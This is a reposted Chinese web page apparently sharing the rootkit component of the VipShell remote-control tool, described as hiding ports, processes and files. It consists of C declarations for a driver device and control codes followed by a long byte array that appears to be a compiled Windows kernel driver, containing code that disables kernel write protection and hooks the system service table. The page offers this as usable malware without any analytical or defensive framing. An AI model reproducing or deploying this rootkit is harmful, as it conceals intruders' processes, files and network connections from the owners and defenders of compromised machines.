程序博客网 > 网络暴力案例

VipShell驱动隐藏模块

来源:互联网 发布:网络暴力案例 编辑:程序博客网 时间:2024/04/30 20:46
目前支持 隐藏端口, 进程, 文件

#include <Windows.h>
#include <stdio.h>
#include "./RootKitModule.h"
#include <atlbase.h>

ADD_PINBOARD(RootKitModule)
BEGIN_DLLCreatePINBOARDINSTANCE
ADD_DLL_PINBOARD_SUSTAIN(RootKitModule)
END_DLLCreatePINBOARDINSTANCE

#define DEVICE_FILTER_INDEX 0x860


#define ZFJ_ROOTKIT_ADDHIDEFILE CTL_CODE(FILE_DEVICE_UNKNOWN,DEVICE_FILTER_INDEX+2,METHOD_BUFFERED,FILE_ANY_ACCESS)
#define ZFJ_ROOTKIT_DELHIDEFILE CTL_CODE(FILE_DEVICE_UNKNOWN,DEVICE_FILTER_INDEX+3,METHOD_BUFFERED,FILE_ANY_ACCESS)
#define ZFJ_ROOTKIT_STARTHIDEFILE CTL_CODE(FILE_DEVICE_UNKNOWN,DEVICE_FILTER_INDEX+4,METHOD_BUFFERED,FILE_ANY_ACCESS)

#define ZFJ_ROOTKIT_ADDHIDEPROCESS CTL_CODE(FILE_DEVICE_UNKNOWN,DEVICE_FILTER_INDEX+5,METHOD_BUFFERED,FILE_ANY_ACCESS)
#define ZFJ_ROOTKIT_DELHIDEPROCESS CTL_CODE(FILE_DEVICE_UNKNOWN,DEVICE_FILTER_INDEX+6,METHOD_BUFFERED,FILE_ANY_ACCESS)
#define ZFJ_ROOTKIT_STARTHIDEPROCESS CTL_CODE(FILE_DEVICE_UNKNOWN,DEVICE_FILTER_INDEX+7,METHOD_BUFFERED,FILE_ANY_ACCESS)

#define ZFJ_ROOTKIT_ADDHIDEPORT CTL_CODE(FILE_DEVICE_UNKNOWN,DEVICE_FILTER_INDEX+8,METHOD_BUFFERED,FILE_ANY_ACCESS)
#define ZFJ_ROOTKIT_DELHIDEPORT CTL_CODE(FILE_DEVICE_UNKNOWN,DEVICE_FILTER_INDEX+9,METHOD_BUFFERED,FILE_ANY_ACCESS)
#define ZFJ_ROOTKIT_STARTHIDEPORT CTL_CODE(FILE_DEVICE_UNKNOWN,DEVICE_FILTER_INDEX+10,METHOD_BUFFERED,FILE_ANY_ACCESS)



#define MY_DEVICE_NAME "////.//ZFJ_ROOTKIT"


char g_szRootKitModule[] =    "/x4d/x5a/x90/x00/x03/x00/x00/x00/x04/x00/x00/x00/xff/xff/x00/x00"
"/xb8/x00/x00/x00/x00/x00/x00/x00/x40/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/xd8/x00/x00/x00"
"/x0e/x1f/xba/x0e/x00/xb4/x09/xcd/x21/xb8/x01/x4c/xcd/x21/x54/x68"
"/x69/x73/x20/x70/x72/x6f/x67/x72/x61/x6d/x20/x63/x61/x6e/x6e/x6f"
"/x74/x20/x62/x65/x20/x72/x75/x6e/x20/x69/x6e/x20/x44/x4f/x53/x20"
"/x6d/x6f/x64/x65/x2e/x0d/x0d/x0a/x24/x00/x00/x00/x00/x00/x00/x00"
"/x1d/x55/x06/xc0/x59/x34/x68/x93/x59/x34/x68/x93/x59/x34/x68/x93"
"/x59/x34/x69/x93/x48/x34/x68/x93/xda/x3c/x35/x93/x5a/x34/x68/x93"
"/xd7/x3c/x37/x93/x5b/x34/x68/x93/xd7/x3c/x08/x93/x5d/x34/x68/x93"
"/xda/x3c/x32/x93/x58/x34/x68/x93/x52/x69/x63/x68/x59/x34/x68/x93"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x50/x45/x00/x00/x4c/x01/x05/x00"
"/x08/x1c/x0c/x45/x00/x00/x00/x00/x00/x00/x00/x00/xe0/x00/x0e/x01"
"/x0b/x01/x07/x0a/x00/x0e/x00/x00/x00/x10/x00/x00/x00/x00/x00/x00"
"/x00/x40/x00/x00/x00/x10/x00/x00/x00/x20/x00/x00/x00/x00/x01/x00"
"/x00/x10/x00/x00/x00/x02/x00/x00/x05/x00/x02/x00/x05/x00/x02/x00"
"/x05/x00/x02/x00/x00/x00/x00/x00/x00/x60/x00/x00/x00/x04/x00/x00"
"/xcb/xbe/x00/x00/x01/x00/x00/x04/x00/x00/x04/x00/x00/x10/x00/x00"
"/x00/x00/x10/x00/x00/x10/x00/x00/x00/x00/x00/x00/x10/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x30/x40/x00/x00/x28/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x50/x00/x00/xc4/x00/x00/x00"
"/x50/x20/x00/x00/x1c/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x20/x00/x00/x44/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x2e/x74/x65/x78/x74/x00/x00/x00/x82/x09/x00/x00/x00/x10/x00/x00"
"/x00/x0a/x00/x00/x00/x04/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x20/x00/x00/x68/x2e/x72/x64/x61/x74/x61/x00/x00"
"/xbb/x00/x00/x00/x00/x20/x00/x00/x00/x02/x00/x00/x00/x0e/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x40/x00/x00/x48"
"/x2e/x64/x61/x74/x61/x00/x00/x00/x64/x0a/x00/x00/x00/x30/x00/x00"
"/x00/x02/x00/x00/x00/x10/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x40/x00/x00/xc8/x49/x4e/x49/x54/x00/x00/x00/x00"
"/x10/x02/x00/x00/x00/x40/x00/x00/x00/x04/x00/x00/x00/x12/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x20/x00/x00/xe2"
"/x2e/x72/x65/x6c/x6f/x63/x00/x00/xfa/x00/x00/x00/x00/x50/x00/x00"
"/x00/x02/x00/x00/x00/x16/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x40/x00/x00/x42/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x56/x8b/x74/x24/x0c/x8b/x46/x60/x8b/x40/x0c/x8b/x56/x0c/x57/xb9"
"/x98/x21/x22/x00/x33/xff/x3b/xc1/x77/x46/x74/x3b/x2d/x80/x21/x22"
"/x00/x74/x78/x83/xe8/x08/x74/x27/x83/xe8/x04/x74/x1a/x83/xe8/x04"
"/x74/x0e/x83/xe8/x04/x75/x3f/xff/x32/xe8/x54/x06/x00/x00/xeb/x5b"
"/xe8/x89/x03/x00/x00/xeb/x54/x52/xe8/x31/x04/x00/x00/xeb/x4c/x52"
"/xe8/x8f/x04/x00/x00/xeb/x44/xff/x32/xe8/x0c/x06/x00/x00/xeb/x3b"
"/x2d/x9c/x21/x22/x00/x74/x2f/x83/xe8/x04/x74/x21/x83/xe8/x04/x74"
"/x13/x83/xe8/x04/x74/x07/xbf/x10/x00/x00/xc0/xeb/x1e/xe8/x64/x08"
"/x00/x00/xeb/x17/xff/x32/xe8/x0b/x08/x00/x00/xeb/x0e/xff/x32/xe8"
"/x2a/x08/x00/x00/xeb/x05/xe8/x23/x05/x00/x00/x32/xd2/x8b/xce/x89"
"/x7e/x18/xff/x15/x00/x20/x01/x00/x8b/xc7/x5f/x5e/xc2/x08/x00/xcc"
"/x8b/x4c/x24/x08/x83/x61/x18/x00/x32/xd2/xff/x15/x00/x20/x01/x00"
"/x33/xc0/xc2/x08/x00/xcc/x5c/x00/x44/x00/x6f/x00/x73/x00/x44/x00"
"/x65/x00/x76/x00/x69/x00/x63/x00/x65/x00/x73/x00/x5c/x00/x5a/x00"
"/x46/x00/x4a/x00/x5f/x00/x52/x00/x4f/x00/x4f/x00/x54/x00/x4b/x00"
"/x49/x00/x54/x00/x00/x00/x55/x8b/xec/x51/x51/x66/x83/x65/xf8/x00"
"/x57/x33/xc0/x8d/x7d/xfa/xab/x66/xab/xe8/x14/x03/x00/x00/xe8/xff"
"/x04/x00/x00/xe8/x22/x08/x00/x00/x68/xc6/x10/x01/x00/x8d/x45/xf8"
"/x50/xff/x15/x0c/x20/x01/x00/x83/x7d/xfc/x00/x5f/x74/x0a/x8d/x45"
"/xf8/x50/xff/x15/x08/x20/x01/x00/x8b/x45/x08/x85/xc0/x74/x17/x56"
"/x8b/x70/x04/xeb/x0c/x8b/xc6/x8b/x76/x0c/x50/xff/x15/x04/x20/x01"
"/x00/x85/xf6/x75/xf0/x5e/xc9/xc2/x04/x00/x5c/x00/x44/x00/x65/x00"
"/x76/x00/x69/x00/x63/x00/x65/x00/x5c/x00/x5a/x00/x46/x00/x4a/x00"
"/x5f/x00/x52/x00/x4f/x00/x4f/x00/x54/x00/x4b/x00/x49/x00/x54/x00"
"/x00/x00/x5c/x00/x44/x00/x6f/x00/x73/x00/x44/x00/x65/x00/x76/x00"
"/x69/x00/x63/x00/x65/x00/x73/x00/x5c/x00/x5a/x00/x46/x00/x4a/x00"
"/x5f/x00/x52/x00/x4f/x00/x4f/x00/x54/x00/x4b/x00/x49/x00/x54/x00"
"/x00/x00/x55/x8b/xec/x83/xec/x14/x53/x56/x57/x33/xc0/x33/xdb/x66"
"/x89/x5d/xf4/x8d/x7d/xf6/xab/x66/xab/x33/xc0/x66/x89/x5d/xec/x8d"
"/x7d/xee/xab/x66/xab/x8b/x3d/x0c/x20/x01/x00/x68/x5a/x11/x01/x00"
"/x8d/x45/xf4/x50/x89/x5d/xfc/xff/xd7/x8b/x75/x08/x8d/x45/xfc/x50"
"/x53/x53/x6a/x22/x8d/x45/xf4/x50/x53/x56/xff/x15/x14/x20/x01/x00"
"/x3b/xc3/x7c/x5f/xe8/x61/x02/x00/x00/xe8/x4c/x04/x00/x00/xe8/x73"
"/x06/x00/x00/x68/x82/x11/x01/x00/x8d/x45/xec/x50/xff/xd7/x8d/x45"
"/xf4/x50/x8d/x45/xec/x50/xff/x15/x10/x20/x01/x00/x8b/xf8/x3b/xfb"
"/x7d/x10/x39/x5d/xfc/x74/x2a/xff/x75/xfc/xff/x15/x04/x20/x01/x00"
"/xeb/x1f/xb8/xb0/x10/x01/x00/x89/x46/x38/x89/x46/x40/x89/x46/x44"
"/x89/x46/x48/xc7/x46/x70/x00/x10/x01/x00/xc7/x46/x34/xf6/x10/x01"
"/x00/x8b/xc7/x5f/x5e/x5b/xc9/xc2/x08/x00/x00/xcc/x55/x8b/xec/x83"
"/xec/x18/x53/x8b/x5d/x1c/x56/xff/x75/x30/xff/x75/x2c/xff/x75/x28"
"/xff/x75/x24/xff/x75/x20/x53/xff/x75/x18/xff/x75/x14/xff/x75/x10"
"/xff/x75/x0c/xff/x75/x08/xff/x15/x08/x3a/x01/x00/x89/x45/x30/x68"
"/x6a/x12/x01/x00/x8d/x45/xf8/x50/xff/x15/x28/x20/x01/x00/x33/xf6"
"/x39/x75/x30/x0f/x8c/x0c/x01/x00/x00/x83/x7d/x24/x03/x0f/x85/x02"
"/x01/x00/x00/x57/x0f/xb7/x4d/xf8/x8b/x7d/xfc/x8b/xd1/x33/xc0/xc1"
"/xe9/x02/xf3/xab/x8b/xca/x83/xe1/x03/xf3/xaa/x33/xc0/x39/x03/x0f"
"/x94/xc0/x89/x45/x24/x8d/x43/x5e/x50/x8d/x45/xf0/x50/xff/x15/x0c"
"/x20/x01/x00/x8b/x3d/x24/x20/x01/x00/x6a/x01/x8d/x45/xf0/x50/x8d"
"/x45/xf8/x50/xff/xd7/x6a/x01/x8d/x45/xf0/x50/x8d/x45/xe8/x50/xff"
"/xd7/x8d/x45/xe8/x50/x8d/x45/xf8/x50/xff/x15/x20/x20/x01/x00/x8b"
"/x43/x3c/x8b/x4d/xfc/xd1/xe8/xc6/x04/x08/x00/xbf/x08/x30/x01/x00"
"/x8b/xc7/x8d/x50/x01/x8a/x08/x40/x84/xc9/x75/xf9/x2b/xc2/x89/x45"
"/x2c/x74/x61/x8b/x43/x3c/xd1/xe8/x50/x57/xff/x75/xfc/xff/x15/x1c"
"/x20/x01/x00/x8b/x4b/x3c/xd1/xe9/x3b/xc1/x74/x10/x81/xc7/x00/x01"
"/x00/x00/x81/xff/x08/x3a/x01/x00/x7c/xc6/xeb/x38/x83/x7d/x24/x00"
"/x74/x13/x3b/x5d/x1c/x75/x09/xc7/x45/x30/x06/x00/x00/x80/xeb/x24"
"/x83/x26/x00/xeb/x1f/x8b/x03/x8b/x4d/x1c/x2b/xc8/x2b/xcb/x03/x4d"
"/x20/x8d/x34/x18/x8b/xc1/xc1/xe9/x02/x8b/xfb/xf3/xa5/x8b/xc8/x83"
"/xe1/x03/xf3/xa4/x8b/xf3/x03/x1b/x83/x7d/x24/x00/x0f/x84/x12/xff"
"/xff/xff/x8b/x35/x18/x20/x01/x00/x8d/x45/xe8/x50/xff/xd6/x8d/x45"
"/xf8/x50/xff/xd6/x5f/x8b/x45/x30/x5e/x5b/xc9/xc2/x2c/x00/x83/x3d"
"/x08/x3a/x01/x00/x00/x74/x03/x33/xc0/xc3/x8b/x0d/x30/x20/x01/x00"
"/x8b/x15/x2c/x20/x01/x00/x8b/x41/x01/x8b/x12/x8b/x04/x82/xa3/x08"
"/x3a/x01/x00/xfa/x0f/x20/xc0/x25/xff/xff/xfe/xff/x0f/x22/xc0/x8b"
"/x41/x01/x8b/x0d/x2c/x20/x01/x00/x8b/x09/xc7/x04/x81/x6c/x12/x01"
"/x00/x0f/x20/xc0/x0d/x00/x00/x01/x00/x0f/x22/xc0/xfb/x33/xc0/x40"
"/xc3/xcc/x83/x3d/x08/x3a/x01/x00/x00/x75/x03/x33/xc0/xc3/xfa/x0f"
"/x20/xc0/x25/xff/xff/xfe/xff/x0f/x22/xc0/x8b/x0d/x2c/x20/x01/x00"
"/xa1/x30/x20/x01/x00/x8b/x40/x01/x8b/x09/x8b/x15/x08/x3a/x01/x00"
"/x89/x14/x81/x0f/x20/xc0/x0d/x00/x00/x01/x00/x0f/x22/xc0/xfb/x83"
"/x25/x08/x3a/x01/x00/x00/x33/xc0/x40/xc3/x57/xb9/x80/x02/x00/x00"
"/x33/xc0/xbf/x08/x30/x01/x00/xf3/xab/x5f/xc3/xcc/x00/xcc/x53/x56"
"/x57/x33/xd2/xbf/x08/x30/x01/x00/x8b/x74/x24/x10/x8b/xc7/x8a/x18"
"/x8a/xcb/x3a/x1e/x75/x1a/x84/xc9/x74/x12/x8a/x58/x01/x8a/xcb/x3a"
"/x5e/x01/x75/x0c/x40/x40/x46/x46/x84/xc9/x75/xe2/x33/xc0/xeb/x05"
"/x1b/xc0/x83/xd8/xff/x85/xc0/x74/x17/x81/xc7/x00/x01/x00/x00/x42"
"/x81/xff/x08/x3a/x01/x00/x7c/xc0/x33/xc0/x5f/x5e/x5b/xc2/x04/x00"
"/xa0/x7c/x14/x01/x00/xc1/xe2/x08/x88/x82/x08/x30/x01/x00/x33/xc0"
"/x40/xeb/xe7/xcc/x55/x8b/xec/x51/x56/x57/x33/xc9/xbf/x08/x30/x01"
"/x00/x8b/xc7/x8d/x70/x01/x8a/x10/x40/x84/xd2/x75/xf9/x2b/xc6/x89"
"/x45/xfc/x74/x17/x81/xc7/x00/x01/x00/x00/x41/x81/xff/x08/x3a/x01"
"/x00/x7c/xde/x33/xc0/x5f/x5e/xc9/xc2/x04/x00/x8b/x45/x08/xc1/xe1"
"/x08/x8d/x91/x08/x30/x01/x00/x2b/xd0/x8a/x08/x88/x0c/x02/x40/x84"
"/xc9/x75/xf6/x33/xc0/x40/xeb/xdd/x55/x8b/xec/x56/xff/x75/x14/x8b"
"/x75/x0c/xff/x75/x10/x56/xff/x75/x08/xff/x15/x34/x3a/x01/x00/x85"
"/xc0/x7c/x65/x83/x7d/x08/x05/x75/x5f/x8b/x16/x57/x33/xff/x85/xd2"
"/x8b/xce/x74/x4f/x8d/x0c/x32/xeb/x4a/xbe/x0c/x3a/x01/x00/x8b/x16"
"/x85/xd2/x74/x2d/x39/x51/x44/x75/x19/x85/xff/x74/x0d/x8b/x11/x85"
"/xd2/x74/x04/x01/x17/xeb/x03/x83/x27/x00/x8b/x11/x85/xd2/x74/x0f"
"/x03/xca/x83/xc6/x04/x81/xfe/x34/x3a/x01/x00/x7c/xd1/xeb/x02/x33"
"/xc9/x85/xc9/x74/x12/x8b/x11/x85/xd2/x8b/xf9/x74/x04/x03/xca/xeb"
"/x02/x33/xc9/x85/xc9/x75/xb2/x5f/x5e/x5d/xc2/x10/x00/xcc/x83/x3d"
"/x34/x3a/x01/x00/x00/x74/x03/x33/xc0/xc3/x8b/x0d/x34/x20/x01/x00"
"/x8b/x15/x2c/x20/x01/x00/x8b/x41/x01/x8b/x12/x8b/x04/x82/xa3/x34"
"/x3a/x01/x00/xfa/x0f/x20/xc0/x25/xff/xff/xfe/xff/x0f/x22/xc0/x8b"
"/x41/x01/x8b/x0d/x2c/x20/x01/x00/x8b/x09/xc7/x04/x81/x38/x15/x01"
"/x00/x0f/x20/xc0/x0d/x00/x00/x01/x00/x0f/x22/xc0/xfb/x33/xc0/x40"
"/xc3/xcc/x83/x3d/x34/x3a/x01/x00/x00/x75/x03/x33/xc0/xc3/xfa/x0f"
"/x20/xc0/x25/xff/xff/xfe/xff/x0f/x22/xc0/x8b/x0d/x2c/x20/x01/x00"
"/xa1/x34/x20/x01/x00/x8b/x40/x01/x8b/x09/x8b/x15/x34/x3a/x01/x00"
"/x89/x14/x81/x0f/x20/xc0/x0d/x00/x00/x01/x00/x0f/x22/xc0/xfb/x83"
"/x25/x34/x3a/x01/x00/x00/x33/xc0/x40/xc3/x57/x6a/x0a/x59/x33/xc0"
"/xbf/x0c/x3a/x01/x00/xf3/xab/x5f/xc3/xcc/x33/xc0/x8b/x0c/x85/x0c"
"/x3a/x01/x00/x3b/x4c/x24/x04/x74/x0b/x40/x83/xf8/x0a/x7c/xed/x33"
"/xc0/xc2/x04/x00/x83/x24/x85/x0c/x3a/x01/x00/x00/x33/xc0/x40/xeb"
"/xf0/xcc/x33/xc0/x83/x3c/x85/x0c/x3a/x01/x00/x00/x74/x0b/x40/x83"
"/xf8/x0a/x7c/xf0/x33/xc0/xc2/x04/x00/x8b/x4c/x24/x04/x89/x0c/x85"
"/x0c/x3a/x01/x00/x33/xc0/x40/xeb/xed/xcc/x55/x8b/xec/x83/xec/x24"
"/x53/x8b/x5d/x28/x56/xff/x75/x2c/x8b/x75/x20/x53/xff/x75/x24/x56"
"/xff/x75/x1c/xff/x75/x18/xff/x75/x14/xff/x75/x10/xff/x75/x0c/xff"
"/x75/x08/xff/x15/x60/x3a/x01/x00/x81/x7d/x1c/x03/x00/x12/x00/x89"
"/x45/x28/x0f/x85/x88/x01/x00/x00/x85/xc0/x57/x0f/x8c/x7e/x01/x00"
"/x00/x83/x65/xe0/x00/x6a/x05/x59/x8d/x7d/xdc/x33/xd2/xc7/x45/xdc"
"/x00/x04/x00/x00/xc7/x45/xe4/x00/x02/x00/x00/xc7/x45/xe8/x00/x01"
"/x00/x00/xc7/x45/xec/x01/x01/x00/x00/xf3/xa7/x0f/x85/x98/x00/x00"
"/x00/x8b/x45/x18/x8b/x40/x04/x6a/x14/x59/xf7/xf1/x83/x65/x1c/x00"
"/x85/xc0/x7e/x7a/x8d/x48/xff/x89/x4d/x20/x8d/x4b/x14/x89/x4d/x2c"
"/xbe/x38/x3a/x01/x00/x8b/x3e/x85/xff/x74/x54/x33/xc9/x8a/x6b/x08"
"/x8a/x4b/x09/x3b/xcf/x74/x0d/x83/xc6/x04/x81/xfe/x60/x3a/x01/x00"
"/x7c/xe3/xeb/x3b/x8b/x4d/x20/x39/x4d/x1c/x74/x2f/x8b/x75/x2c/x8b"
"/xc8/x2b/x4d/x1c/x8b/xfb/x49/x8d/x0c/x89/xc1/xe1/x02/x8b/xd1/xc1"
"/xe9/x02/xf3/xa5/x8b/xca/x83/xe1/x03/x48/xff/x4d/x20/xff/x4d/x1c"
"/x83/xeb/x14/x83/x6d/x2c/x14/xf3/xa4/xeb/x04/x48/xff/x4d/x20/xff"
"/x45/x1c/x83/x45/x2c/x14/x83/xc3/x14/x39/x45/x1c/x7c/x92/x8d/x04"
"/x80/xc1/xe0/x02/xe9/xad/x00/x00/x00/x8b/x75/x20/x6a/x05/x59/x8d"
"/x7d/xdc/x33/xd2/xc7/x45/xec/x02/x01/x00/x00/xf3/xa7/x0f/x85/x9c"
"/x00/x00/x00/x8b/x45/x18/x8b/x40/x04/x6a/x18/x59/xf7/xf1/x83/x65"
"/x1c/x00/x85/xc0/x7e/x7a/x8d/x48/xff/x89/x4d/x20/x8d/x4b/x18/x89"
"/x4d/x2c/xbe/x38/x3a/x01/x00/x8b/x3e/x85/xff/x74/x54/x33/xc9/x8a"
"/x6b/x08/x8a/x4b/x09/x3b/xcf/x74/x0d/x83/xc6/x04/x81/xfe/x60/x3a"
"/x01/x00/x7c/xe3/xeb/x3b/x8b/x4d/x20/x39/x4d/x1c/x74/x2f/x8b/x75"
"/x2c/x8b/xc8/x2b/x4d/x1c/x8b/xfb/x49/x8d/x0c/x49/xc1/xe1/x03/x8b"
"/xd1/xc1/xe9/x02/xf3/xa5/x8b/xca/x83/xe1/x03/x48/xff/x4d/x20/xff"
"/x4d/x1c/x83/xeb/x18/x83/x6d/x2c/x18/xf3/xa4/xeb/x04/x48/xff/x4d"
"/x20/xff/x45/x1c/x83/x45/x2c/x18/x83/xc3/x18/x39/x45/x1c/x7c/x92"
"/x8d/x04/x40/xc1/xe0/x03/x8b/x4d/x18/x89/x41/x04/x8b/x45/x28/x5f"
"/x5e/x5b/xc9/xc2/x28/x00/x57/x6a/x0a/x59/x33/xc0/xbf/x38/x3a/x01"
"/x00/xf3/xab/x5f/xc3/xcc/x33/xc0/x8b/x0c/x85/x38/x3a/x01/x00/x3b"
"/x4c/x24/x04/x74/x0b/x40/x83/xf8/x0a/x7c/xed/x33/xc0/xc2/x04/x00"
"/x83/x24/x85/x38/x3a/x01/x00/x00/x33/xc0/x40/xeb/xf0/xcc/x33/xc0"
"/x83/x3c/x85/x38/x3a/x01/x00/x00/x74/x0b/x40/x83/xf8/x0a/x7c/xf0"
"/x33/xc0/xc2/x04/x00/x8b/x4c/x24/x04/x89/x0c/x85/x38/x3a/x01/x00"
"/x33/xc0/x40/xeb/xed/xcc/x83/x3d/x60/x3a/x01/x00/x00/x74/x03/x33"
"/xc0/xc3/x8b/x0d/x38/x20/x01/x00/x8b/x15/x2c/x20/x01/x00/x8b/x41"
"/x01/x8b/x12/x8b/x04/x82/xa3/x60/x3a/x01/x00/xfa/x0f/x20/xc0/x25"
"/xff/xff/xfe/xff/x0f/x22/xc0/x8b/x41/x01/x8b/x0d/x2c/x20/x01/x00"
"/x8b/x09/xc7/x04/x81/xba/x16/x01/x00/x0f/x20/xc0/x0d/x00/x00/x01"
"/x00/x0f/x22/xc0/xfb/x33/xc0/x40/xc3/xcc/x83/x3d/x60/x3a/x01/x00"
"/x00/x75/x03/x33/xc0/xc3/xfa/x0f/x20/xc0/x25/xff/xff/xfe/xff/x0f"
"/x22/xc0/x8b/x0d/x2c/x20/x01/x00/xa1/x38/x20/x01/x00/x8b/x40/x01"
"/x8b/x09/x8b/x15/x60/x3a/x01/x00/x89/x14/x81/x0f/x20/xc0/x0d/x00"
"/x00/x01/x00/x0f/x22/xc0/xfb/x83/x25/x60/x3a/x01/x00/x00/x33/xc0"
"/x40/xc3/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x9c/x40/x00/x00/xb2/x40/x00/x00/xc4/x40/x00/x00/xdc/x40/x00/x00"
"/xf4/x40/x00/x00/x0c/x41/x00/x00/x1e/x41/x00/x00/x32/x41/x00/x00"
"/x46/x41/x00/x00/x58/x41/x00/x00/x78/x41/x00/x00/x8c/x41/x00/x00"
"/xa8/x41/x00/x00/xc0/x41/x00/x00/xdc/x41/x00/x00/xf4/x41/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x08/x1c/x0c/x45/x00/x00/x00/x00/x02/x00/x00/x00"
"/x4f/x00/x00/x00/x6c/x20/x00/x00/x6c/x0e/x00/x00/x52/x53/x44/x53"
"/x18/xdc/xdd/xe4/x21/x5b/x6e/x46/xa0/xa1/xff/x50/x1b/x09/xb7/x9c"
"/x01/x00/x00/x00/x65/x3a/x5c/x64/x64/x6b/x77/x6f/x72/x6b/x5c/x64"
"/x72/x69/x76/x65/x72/x31/x5c/x6f/x62/x6a/x66/x72/x65/x5f/x77/x6e"
"/x65/x74/x5f/x78/x38/x36/x5c/x69/x33/x38/x36/x5c/x48/x65/x6c/x6c"
"/x6f/x57/x6f/x72/x6c/x64/x2e/x70/x64/x62/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
